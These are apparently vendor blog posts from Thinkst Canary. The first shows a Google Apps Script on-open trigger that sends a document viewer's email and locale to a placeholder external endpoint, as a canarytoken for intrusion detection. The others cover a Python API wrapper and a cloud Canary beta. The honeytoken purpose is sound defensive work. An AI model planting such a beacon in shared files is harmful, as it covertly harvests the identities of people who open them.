Google Apps Script is a powerful Javascript platform with which to create add-ons for Google Sheets, Docs, or Forms. Apps Script allows your documents to interface with most Google services - it's pretty sweet. Want to access all your Drive files from a spreadsheet? No problem! Want to access the Google Maps service from a document? No problem! Want to hook the Language API to your Google Forms? Easy. It's also possible to create extensions to share with the community. You can even add custom UI features.

The Apps Script files can be published in three different ways.

  1. The script may be bound to a document (this is the approach we followed);
  2. It may be published as a Chrome extension;
  3. It may be published to be used by the Google Execution API (the Execution API basically allows you to create your own API endpoints to be used by a client application).

With the script bound to a document, the Apps Script features most important for our purposes are: Triggers, the UrlFetchApp service, and the Session service. A brief outline of the flow is:

  1. A user opens the document;
  2. A trigger is fired which grabs the perpetrator's email address;
  3. This is sent in a notification request to the document owner.

A more detailed outline of each feature is given below.

Triggers

Apps Script triggers come in two flavours: simple and installable. The main difference between the two is the number of services they're allowed to access. Many services require user authorisation before giving the app access to a user's data. Each flavour also has separate types. For example: "on open", "on edit", "on install", even timed triggers.  For our purposes the "on open" installable triggers proved most useful.

UrlFetchApp service

This service simply gives one's script the ability to make HTTP requests. We used it to send the requests needed to notify the document owner that the tokened document had been opened. Useful information about the document viewer may also be sent as the payload of a POST request.

Session service

The Session service provides access to session information, such as the user's email address and language setting. This was used to see exactly which user opened the document.

Putting it all together

So, what does this all look like? Let's go ahead and open up a new Google sheet and navigate to the Script editor.


Open the Script editor


Once in the Script editor, create a new function named whatever you like (in our case it is called "notify"). Here a payload object is constructed which contains the email address of the document owner, the email address of the document viewer and the document viewer's locale. This information is then sent to an endpoint. Here we use Hookbin for convenience.


Write a function which sends user information to an endpoint
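The screenshot isn't reproduced here, but the function is only a few lines of Apps Script; a sketch along those lines (the Hookbin URL is a placeholder, and the field names are our own):

function notify() {
  var payload = {
    owner: Session.getEffectiveUser().getEmail(),  // the account the trigger runs as (the document owner)
    viewer: Session.getActiveUser().getEmail(),    // the user who just opened the document
    locale: Session.getActiveUserLocale()
  };
  // Placeholder endpoint; swap in your own collector
  UrlFetchApp.fetch('https://hookb.in/XXXXXXXX', {
    method: 'post',
    contentType: 'application/json',
    payload: JSON.stringify(payload)
  });
}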


Once the file has been saved and our notify function is solid, we can go ahead and add the "on open" trigger. To do this: open the Edit tab dropdown from the script editor and go to "Current project's triggers".

Open the project's triggers


Under the current project's triggers add an "On open" trigger to the notify function. This trigger will cause the "notify" function to run each time the document is opened.


Add an "On open" trigger to the "notify" function

Because the function is accessing user data (the Session service) as well as connecting to an external service (sending requests to Hookbin) the script will require a set of permissions to be accepted before being run.


Set of permissions needed by the installable trigger


Once the permissions have been accepted, all that remains is for the document to be shared. You can share the document with specific people or anyone on the internet. The only caveat is that the document needs to be shared with EDIT permissions or else the script will not function correctly.

Every time the document is opened, a POST request is sent to the endpoint. Below is an example of the contents of the POST request sent to Hookbin.

The request contents received by the endpoint

Limitations

We ran into a few limitations while investigating the use of Apps Script for tokens. While copying a document as another Google user would also copy the script bound to the document, it would not copy the triggers if any had been previously installed. Thus, the user with which the document was shared would need to manually add the triggers to the copied document. Another limitation was that anyone viewing the document needed to have EDIT permissions in order for the script to work correctly. This could prove problematic if the person viewing the document decided to delete/edit the script and/or document.

We overcame this through some creativity and elbow grease.

onEnd()

Thanks for reading. The methods described here were used in our new Google Docs/Sheets Canarytokens for our Canary product; you should totally check them out! We hope you found this useful and that you'll come up with some other cool new ways to use Google Apps Script!

Introducing our Python API Wrapper



With our shiny new Python API wrapper, managing your deployed Canaries has never been simpler. With just a few simple lines of code you'll be able to sort and store incident data, reboot all of your devices, create Canarytokens, and much more (Building URLs correctly and parsing JSON strings is for the birds...).

So, how do you get started? Firstly you'll need to install our package. You can grab it from a number of places, or simply start up your favourite shell and run "pip install canarytools".
Assuming you already have your own Canary Console (see our website for product options) and a flock of devices, getting started is very easy indeed! First, instantiate the Console object: 
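The snippet in the original post is an image; in code it's roughly the following (the key and domain are placeholders, explained below):

import canarytools

console = canarytools.Console(api_key='API_KEY', domain='CLIENT_DOMAIN')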


Your API_KEY can be retrieved from your Console's Console Setup page. The CLIENT_DOMAIN is the tag in front of "canary.tools" in your Console's URL. For example, in https://testconsole.canary.tools/settings, "testconsole" is the domain.

Alternatively a .config file can be downloaded and placed on your system (place this in ~/ for Unix (and Unix-like) environments and C:\Users\{Current Users}\ for Windows environments). This file contains all the goodies needed for the wrapper to communicate with the Console. Grab this from the Canary Console API tab under Console Setup (This is great if you'd rather not keep your api_key and/or domain name in your code base).



Click 'Download Token File' to download the API configuration file.




To give you a taste of what you can do with this wrapper, let's have a look at a few of its features:

Device Features

Want to manage all of your devices from the comfort of your bash shell? No problem...

Assuming we have instantiated our Console object we can get a handle to all our devices in a single line of code:

From here it is straightforward to do things such as update all your devices, or even reboot them:
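Roughly (method names as per the wrapper's documentation; treat this as a sketch and check the docs for the exact calls):

# One line to fetch every bird paired with the console
devices = console.devices.all()

# From there, management calls hang off each device object
for device in devices:
    device.reboot()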

Incident Features

Need the ability to quickly access all of the incidents in your console? We've got you covered. Getting a list of incidents across all your devices and printing the source IP of each incident is easy:

Acknowledging incidents is also straightforward. Let's take a look at acknowledging all incidents from a particular device that are 3 weeks or older:
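A sketch of both (the method and attribute names here - all(), src_host, acknowledge(), and the node_id/older_than parameters - are our recollection of the wrapper's documented interface, so verify them against the docs):

# Print the source IP of every incident on the console
for incident in console.incidents.all():
    print(incident.src_host)

# Acknowledge everything from one device that is three weeks old or older
console.incidents.acknowledge(node_id='DEVICE_NODE_ID', older_than='3 weeks')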


Canarytoken Features

Canarytokens are one of the newest features enabled on our consoles. (You can read about them here). Manage your Canarytokens with ease. To get a list of all your tokens simply call:

You can also create tokens:


Enable/disable your tokens:


Whitelist Features

If you'd like to whitelist IP addresses and destination ports programmatically, we cater for that too:


This is just a tiny taste of what you can do with the API. Head over to our documentation to see more. We're hoping the API will make your (programmatic) interactions with our birds a breeze.

Cloud Canary Beta

Is that a cloud next to Tux?

We are sorry that this blog has been so quiet lately. Our Canary product took off like a rocket and we've had our heads down giving it our all. This month we released version-2 with a bunch of new features. You really should check it out.

Since almost day one, customers have been asking for virtual Canaries.  We generally prefer doing one thing really well over doing multiple things "kinda ok", so we held off virtualising Canary for a long time. This changes now.

With Canary software now on version 2.0 and running happily across thousands of birds, a crack at virtual Canaries makes sense. Over the past couple of months we’ve been working to get Canaries virtualised, with a specific initial focus on Amazon’s EC2.

We're inviting customers to participate in a beta for running Canaries in Amazon’s EC2. The benefits are what you’d expect: no hardware, no waiting for shipments and rapid deployments. You can plaster your EC2 environment with Canaries, trivially.

The beta won't affect your current licensing, and you’re free to deploy as many Cloud Canaries as you like during the beta period. They use the same console as your other birds, and integrate seamlessly.

Mail cloudcanarybeta@canary.tools if you’d like to participate and we'll make it happen.